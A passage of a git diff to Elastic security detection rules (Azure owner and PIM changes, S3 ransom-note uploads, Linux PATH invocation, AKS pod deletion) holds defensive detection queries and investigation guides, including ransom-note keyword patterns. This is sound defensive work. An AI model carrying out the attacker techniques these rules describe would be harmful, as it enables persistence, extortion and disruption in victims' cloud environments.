"related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1486", - "name": "Data Encrypted for Impact", - "reference": "https://attack.mitre.org/techniques/T1486/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "721999d0-7ab2-44bf-b328-6e63367b9b29_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_3.json index 537cdad2327..6394727c122 100644 --- a/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_3.json @@ -23,6 +23,13 @@ "references": [ "https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 21, "rule_id": "74f45152-9aee-11ef-b0a5-f661ea17fbcd", "severity": "low", diff --git a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_103.json b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_103.json deleted file mode 100644 index 028d91bb897..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_103.json +++ /dev/null @@ -1,74 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "User Added as Owner for Azure Application", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating User Added as Owner for Azure Application\n\nAzure applications often require specific permissions for functionality, managed by assigning user roles. An adversary might exploit this by adding themselves or a compromised account as an owner, gaining elevated privileges to alter configurations or access sensitive data. The detection rule monitors audit logs for successful operations where a user is added as an application owner, flagging potential unauthorized privilege escalations.\n\n### Possible investigation steps\n\n- Review the Azure audit logs to confirm the operation by filtering for event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to application\" with a successful outcome.\n- Identify the user account that was added as an owner and the account that performed the operation to determine if they are legitimate or potentially compromised.\n- Check the history of activities associated with both the added owner and the account that performed the operation to identify any suspicious behavior or patterns.\n- Verify the application's current configuration and permissions to assess any changes made after the new owner was added.\n- Contact the legitimate owner or administrator of the Azure application to confirm whether the addition of the new owner was authorized.\n- Investigate any recent changes in the organization's user access policies or roles that might explain the addition of a new owner.\n\n### False positive analysis\n\n- Routine administrative actions: Regular maintenance or updates by IT staff may involve adding users as application owners. To manage this, create a list of authorized personnel and exclude their actions from triggering alerts.\n- Automated processes: Some applications may have automated scripts or services that add users as owners for operational purposes. Identify these processes and configure exceptions for their activities.\n- Organizational changes: During mergers or restructuring, there may be legitimate reasons for adding multiple users as application owners. Temporarily adjust the rule to accommodate these changes and review the audit logs manually.\n- Testing and development: In development environments, users may be added as owners for testing purposes. Exclude these environments from the rule or set up a separate monitoring policy with adjusted thresholds.\n\n### Response and remediation\n\n- Immediately revoke the added user's owner permissions from the Azure application to prevent further unauthorized access or configuration changes.\n- Conduct a thorough review of recent activity logs for the affected application to identify any unauthorized changes or data access that may have occurred since the user was added as an owner.\n- Reset credentials and enforce multi-factor authentication for the compromised or suspicious account to prevent further misuse.\n- Notify the security team and relevant stakeholders about the incident for awareness and potential escalation if further investigation reveals broader compromise.\n- Implement additional monitoring on the affected application and related accounts to detect any further unauthorized access attempts or privilege escalations.\n- Review and update access control policies to ensure that only authorized personnel can modify application ownership, and consider implementing stricter approval processes for such changes.\n- Document the incident, including actions taken and lessons learned, to improve response strategies and prevent recurrence.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to application\" and event.outcome:(Success or success)\n", - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "774f5e28-7b75-4a58-b94e-41bf060fdd86", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "774f5e28-7b75-4a58-b94e-41bf060fdd86_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json deleted file mode 100644 index abedf3c5a73..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json +++ /dev/null @@ -1,93 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Privilege Identity Management Role Modified", - "note": "## Triage and analysis\n\n### Investigating Azure Privilege Identity Management Role Modified\n\nAzure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator.\n\nThis rule identifies the update of PIM role settings, which can indicate that an attacker has already gained enough access to modify role assignment settings.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the user who issued the command. Do they look normal for the user?\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day?\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the account's commands, API calls, and data management actions in the last 24 hours.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this activity didn't follow your organization's change management policies, it should be reviewed by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Restore the PIM roles to the desired state.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Update role setting in PIM\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-resource-roles-assign-roles", - "https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "7882cebf-6cf1-4de3-9662-213aa13e8b80", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "7882cebf-6cf1-4de3-9662-213aa13e8b80_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_6.json b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_6.json index 5b0c3f81fb4..86e5c3e74c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_6.json +++ b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_6.json @@ -16,6 +16,12 @@ "references": [ "https://en.wikipedia.org/wiki/List_of_file_signatures" ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], "required_fields": [ { "ecs": true, diff --git a/packages/security_detection_engine/kibana/security_rule/7fda9bb2-fd28-11ee-85f9-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/7fda9bb2-fd28-11ee-85f9-f661ea17fbce_4.json deleted file mode 100644 index f14e1f3d3ca..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/7fda9bb2-fd28-11ee-85f9-f661ea17fbce_4.json +++ /dev/null @@ -1,57 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims.", - "false_positives": [ - "Administrators may legitimately access, delete, and replace objects in S3 buckets. Ensure that the sequence of events is not part of a legitimate operation before taking action." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential AWS S3 Bucket Ransomware Note Uploaded", - "note": "\n## Triage and analysis\n\n### Investigating Potential AWS S3 Bucket Ransomware Note Uploaded\n\nThis rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims.\n\n#### Possible Investigation Steps:\n\n- **Identify the Actor**: Review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` fields to identify who performed the action. Verify if this actor typically performs such actions and if they have the necessary permissions.\n- **Review the Request Details**: Examine the `aws.cloudtrail.request_parameters` to understand the specific details of the `PutObject` action. Look for any unusual parameters that could suggest unauthorized or malicious modifications.\n- **Analyze the Source of the Request**: Investigate the `source.ip` and `source.geo` fields to determine the geographical origin of the request. An external or unexpected location might indicate compromised credentials or unauthorized access.\n- **Contextualize with Timestamp**: Use the `@timestamp` field to check when the ransom note was uploaded. Changes during non-business hours or outside regular maintenance windows might require further scrutiny.\n- **Inspect the Ransom Note**: Review the `aws.cloudtrail.request_parameters` for the `PutObject` action to identify the characteristics of the uploaded ransom note. Look for common ransomware file extensions such as `.txt`, `.note`, `.ransom`, or `.html`.\n- **Correlate with Other Activities**: Search for related CloudTrail events before and after this action to see if the same actor or IP address engaged in other potentially suspicious activities.\n- **Check for Object Deletion or Access**: Look for `DeleteObject`, `DeleteObjects`, or `GetObject` API calls to the same S3 bucket that may indicate the adversary accessing and destroying objects before placing the ransom note.\n\n### False Positive Analysis:\n\n- **Legitimate Administrative Actions**: Confirm if the `PutObject` action aligns with scheduled updates, maintenance activities, or legitimate administrative tasks documented in change management systems.\n- **Consistency Check**: Compare the action against historical data of similar activities performed by the user or within the organization. If the action is consistent with past legitimate activities, it might indicate a false alarm.\n- **Verify through Outcomes**: Check the `aws.cloudtrail.response_elements` and the `event.outcome` to confirm if the upload was successful and intended according to policy.\n\n### Response and Remediation:\n\n- **Immediate Review and Reversal if Necessary**: If the activity was unauthorized, remove the uploaded ransom notes from the S3 bucket and review the bucket's access logs for any suspicious activity.\n- **Enhance Monitoring and Alerts**: Adjust monitoring systems to alert on similar `PutObject` actions, especially those involving sensitive data or unusual file extensions.\n- **Educate and Train**: Provide additional training to users with administrative rights on the importance of security best practices concerning S3 bucket management and the risks of ransomware.\n- **Audit S3 Bucket Policies and Permissions**: Conduct a comprehensive audit of all S3 bucket policies and associated permissions to ensure they adhere to the principle of least privilege.\n- **Incident Response**: If there's an indication of malicious intent or a security breach, initiate the incident response protocol to mitigate any damage and prevent future occurrences.\n\n### Additional Information:\n\nFor further guidance on managing S3 bucket security and protecting against ransomware, refer to the [AWS S3 documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html) and AWS best practices for security. Additionally, consult the following resources for specific details on S3 ransomware protection:\n- [ERMETIC REPORT - AWS S3 Ransomware Exposure in the Wild](https://s3.amazonaws.com/bizzabo.file.upload/PtZzA0eFQwV2RA5ysNeo_ERMETIC%20REPORT%20-%20AWS%20S3%20Ransomware%20Exposure%20in%20the%20Wild.pdf)\n- [AWS S3 Ransomware Batch Deletion](https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/)\n- [S3 Ransomware Part 1: Attack Vector](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)\n", - "query": "from logs-aws.cloudtrail-*\n\n// any successful uploads via S3 API requests\n| where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"s3.amazonaws.com\"\n and event.action == \"PutObject\"\n and event.outcome == \"success\"\n\n// abstract object name from API request parameters\n| dissect aws.cloudtrail.request_parameters \"%{?ignore_values}key=%{object_name}}\"\n\n// regex on common ransomware note extensions\n| where object_name rlike \"(.*)(ransom|lock|crypt|enc|readme|how_to_decrypt|decrypt_instructions|recovery|datarescue)(.*)\"\n and not object_name rlike \"(.*)(AWSLogs|CloudTrail|access-logs)(.*)\"\n\n// keep relevant fields\n| keep tls.client.server_name, aws.cloudtrail.user_identity.arn, object_name\n\n// aggregate by S3 bucket, resource and object name\n| stats note_upload_count = count(*) by tls.client.server_name, aws.cloudtrail.user_identity.arn, object_name\n\n// filter for single occurrence to eliminate common upload operations\n| where note_upload_count == 1\n", - "references": [ - "https://s3.amazonaws.com/bizzabo.file.upload/PtZzA0eFQwV2RA5ysNeo_ERMETIC%20REPORT%20-%20AWS%20S3%20Ransomware%20Exposure%20in%20the%20Wild.pdf", - "https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/", - "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/" - ], - "risk_score": 47, - "rule_id": "7fda9bb2-fd28-11ee-85f9-f661ea17fbce", - "setup": "AWS S3 data types need to be enabled in the CloudTrail trail configuration.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS S3", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 4 - }, - "id": "7fda9bb2-fd28-11ee-85f9-f661ea17fbce_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/82f842c2-7c36-438c-b562-5afe54ab11f4_2.json b/packages/security_detection_engine/kibana/security_rule/82f842c2-7c36-438c-b562-5afe54ab11f4_2.json deleted file mode 100644 index 2237f7f9875..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/82f842c2-7c36-438c-b562-5afe54ab11f4_2.json +++ /dev/null @@ -1,124 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Suspicious Path Invocation from Command Line", - "new_terms_fields": [ - "process.parent.executable" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Path Invocation from Command Line\n\nIn Linux environments, shell processes like bash or zsh execute commands, often using the PATH variable to locate executables. Adversaries may manipulate PATH to run malicious scripts from non-standard directories, evading detection. The detection rule identifies unusual PATH assignments in command lines, signaling potential unauthorized actions by monitoring specific shell invocations and command patterns.\n\n### Possible investigation steps\n\n- Review the command line details captured in the alert to identify the specific PATH assignment and the command being executed. This can provide insight into whether the command is expected or potentially malicious.\n- Check the process tree to understand the parent process and any child processes spawned by the suspicious shell invocation. This can help determine the context in which the command was executed.\n- Investigate the user account associated with the process to determine if the activity aligns with the user's typical behavior or if the account may have been compromised.\n- Examine the directory from which the command is being executed to verify if it is a non-standard or suspicious location. Look for any unusual files or scripts in that directory.\n- Cross-reference the event with other security logs or alerts to identify any correlated activities that might indicate a broader attack or compromise.\n- Assess the system's recent changes or updates to determine if they could have inadvertently caused the PATH modification or if it was intentionally altered by an adversary.\n\n### False positive analysis\n\n- System administrators or developers may intentionally modify the PATH variable for legitimate purposes, such as testing scripts or applications in development environments. To handle this, create exceptions for known users or specific directories commonly used for development.\n- Automated scripts or configuration management tools might alter the PATH variable as part of their normal operation. Identify these scripts and exclude their execution paths or user accounts from triggering alerts.\n- Some software installations or updates may temporarily change the PATH variable to include non-standard directories. Monitor installation processes and whitelist these activities when performed by trusted sources.\n- Custom shell configurations or user profiles might include PATH modifications for convenience or performance reasons. Review and document these configurations, and exclude them from detection if they are verified as non-threatening.\n- Educational or training environments where users experiment with shell commands may frequently trigger this rule. Consider excluding specific user groups or environments dedicated to learning and experimentation.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent potential lateral movement or data exfiltration.\n- Terminate any suspicious processes identified by the alert to stop any ongoing unauthorized actions.\n- Review the command history and PATH variable changes on the affected system to identify any unauthorized modifications or scripts executed from non-standard directories.\n- Restore the PATH variable to its default state to ensure that only trusted directories are used for command execution.\n- Conduct a thorough scan of the system using updated antivirus or endpoint detection tools to identify and remove any malicious scripts or files.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n- Implement monitoring for similar PATH manipulation attempts across the network to enhance detection and prevent recurrence.", - "query": "event.category:process and host.os.type:linux and event.type:start and event.action:exec and\nprocess.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and process.args:-c and\nprocess.command_line:(*PATH=* and not sh*/run/motd.dynamic.new)\n", - "references": [ - "https://blog.exatrack.com/Perfctl-using-portainer-and-new-persistences/" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "82f842c2-7c36-438c-b562-5afe54ab11f4", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.004", - "name": "Unix Shell", - "reference": "https://attack.mitre.org/techniques/T1059/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1564", - "name": "Hide Artifacts", - "reference": "https://attack.mitre.org/techniques/T1564/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 2 - }, - "id": "82f842c2-7c36-438c-b562-5afe54ab11f4_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_103.json b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_103.json deleted file mode 100644 index 41e3e7186ef..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_103.json +++ /dev/null @@ -1,75 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment.", - "false_positives": [ - "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Pods deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Kubernetes Pods Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Kubernetes Pods Deleted\n\nAzure Kubernetes Service (AKS) enables the deployment, management, and scaling of containerized applications using Kubernetes. Pods, the smallest deployable units in Kubernetes, can be targeted by adversaries to disrupt services or evade detection. Malicious actors might delete pods to cause downtime or hide their activities. The detection rule monitors Azure activity logs for successful pod deletion operations, alerting security teams to potential unauthorized actions that could impact the environment's stability and security.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the details of the pod deletion event, focusing on the operation name \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\" and ensuring the event outcome is marked as \"Success\".\n- Identify the user or service principal responsible for the deletion by examining the associated identity information in the activity logs.\n- Check the timeline of events leading up to the pod deletion to identify any unusual or unauthorized access patterns or activities.\n- Investigate the specific Kubernetes cluster and namespace where the pod deletion occurred to assess the potential impact on services and applications.\n- Cross-reference the deleted pod's details with recent changes or deployments in the environment to determine if the deletion was part of a legitimate maintenance or deployment activity.\n- Consult with the relevant application or infrastructure teams to verify if the pod deletion was authorized and necessary, or if it indicates a potential security incident.\n\n### False positive analysis\n\n- Routine maintenance or updates by authorized personnel can lead to legitimate pod deletions. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks.\n- Automated scaling operations might delete pods as part of normal scaling activities. Identify and exclude these operations by correlating with scaling events or using tags that indicate automated processes.\n- Development and testing environments often experience frequent pod deletions as part of normal operations. Consider excluding these environments from alerts by using environment-specific identifiers or tags.\n- Scheduled job completions may result in pod deletions once tasks are finished. Implement rules to recognize and exclude these scheduled operations by matching them with known job schedules or identifiers.\n\n### Response and remediation\n\n- Immediately isolate the affected Kubernetes cluster to prevent further unauthorized actions. This can be done by restricting network access or applying stricter security group rules temporarily.\n- Review the Azure activity logs to identify the source of the deletion request, including the user or service principal involved, and verify if the action was authorized.\n- Recreate the deleted pods using the latest known good configuration to restore services and minimize downtime.\n- Conduct a thorough security assessment of the affected cluster to identify any additional unauthorized changes or indicators of compromise.\n- Implement stricter access controls and role-based access management to ensure only authorized personnel can delete pods in the future.\n- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or resources are affected.\n- Enhance monitoring and alerting for similar activities by integrating with a Security Information and Event Management (SIEM) system to detect and respond to unauthorized pod deletions promptly.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\" and\nevent.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "83a1931d-8136-46fc-b7b9-2db4f639e014", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Asset Visibility", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "83a1931d-8136-46fc-b7b9-2db4f639e014_103", - "type": "security-rule" -} \ No newline at end of file diff --git 